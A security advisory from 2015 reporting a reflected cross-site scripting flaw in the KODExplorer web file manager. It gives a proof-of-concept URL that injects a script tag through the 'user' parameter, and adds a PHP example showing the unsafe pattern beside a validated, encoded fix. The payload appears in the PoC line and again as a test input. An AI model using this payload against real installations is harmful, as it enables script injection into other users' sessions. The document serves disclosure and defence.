The KODExplorer web file manager suffers from a cross-site scripting vulnerability.
================================================================================
# KODExplorer web file manager - Cross Site Scripting
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - https://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================
# Vulnerable File : file.php
# Vulnerable Code : see line 55 of template/file.php
# PoC :
https://localhost/index.php?share/file&user=admin"></script><script>alert('xss')</script>&sid=
Vulnerable Parameters : admin , sid
Patch released : Check my git https://github.com/xtnr3v0lt/KODExplorer
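
For defenders, an added example (not KODExplorer's code and not the author's patch) of the before and after of this class of bug. The sink shape, an inline script block receiving the `user` and `sid` request values, is an assumption, since line 55 of template/file.php is not reproduced in this advisory; the function names and the allow-list pattern are hypothetical as well.

```php
<?php
declare(strict_types=1);

// Added example, not KODExplorer code. The sink is an ASSUMED shape: request
// values written into an inline <script> block, as the PoC payload suggests.

// BEFORE (assumed): raw concatenation, so `"` and `</script>` break out.
function render_unsafe(string $user, string $sid): string
{
    return '<script>var G = {user: "' . $user . '", sid: "' . $sid . '"};</script>';
}

// Allow-list check. The permitted alphabet and length are assumptions; use
// the formats the application really issues for user names and share ids.
function valid_token(string $value): bool
{
    return preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $value) === 1;
}

// Encoder for a JavaScript context. JSON_HEX_* turns < > & ' " into \uXXXX
// escapes, so a value can neither end the literal nor close the <script> tag.
function js_literal($value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode($value, $flags | JSON_THROW_ON_ERROR);
}

// AFTER: reject unexpected input first, then encode what is left.
function render_safe(string $user, string $sid): ?string
{
    if (!valid_token($user) || !valid_token($sid)) {
        return null; // caller answers HTTP 400 and renders nothing
    }
    return '<script>var G = ' . js_literal(['user' => $user, 'sid' => $sid]) . ';</script>';
}

// Constructed inputs: the PoC value from this advisory and a benign pair.
$poc = 'admin"></script><script>alert(\'xss\')</script>';
foreach ([[$poc, 'abc123'], ['admin', 'abc123']] as [$user, $sid]) {
    echo 'unsafe: ', render_unsafe($user, $sid), PHP_EOL;
    echo 'safe:   ', render_safe($user, $sid) ?? '(rejected, HTTP 400)', PHP_EOL;
}
// The encoder on its own, for sinks where rejecting the request is not an option.
echo 'encoded: ', js_literal($poc), PHP_EOL;
```

If the real sink is an HTML attribute or element body rather than a script block, the matching encoder is `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')`; the allow-list step stays the same.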
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group